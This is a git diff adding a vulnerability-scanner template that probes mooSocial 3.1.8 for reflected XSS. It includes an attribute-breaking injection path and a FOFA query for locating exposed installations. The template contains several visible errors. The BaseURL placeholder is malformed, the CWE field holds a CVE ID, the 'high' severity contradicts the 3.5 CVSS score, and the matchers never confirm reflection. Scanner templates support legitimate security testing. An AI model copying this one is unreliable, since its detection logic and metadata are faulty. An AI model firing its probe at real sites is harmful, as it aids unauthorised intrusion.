diff --git a/http/vulnerabilities/mooSocial-xss.yaml b/http/vulnerabilities/mooSocial-xss.yaml
new file mode 100644
index 0000000000..398029077e
--- /dev/null
+++ b/http/vulnerabilities/mooSocial-xss.yaml
@@ -0,0 +1,39 @@
+id: mooSocial-xss
+
+info:
+ name: mooSocial 3.1.8 - Reflected XSS
+ author: momika233
+ severity: high
+ description: |
+ The attacker can send to victim a link containing a malicious URL in an email or instant message,can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+ reference:
+ - https://www.exploit-db.com/exploits/51670
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 3.5
+ cwe-id: CVE-2023-4173
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: "mooSocial"
+ tags: mooSocial,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}/classifiedsmomika233\">momika233/search?category=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"text":"'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file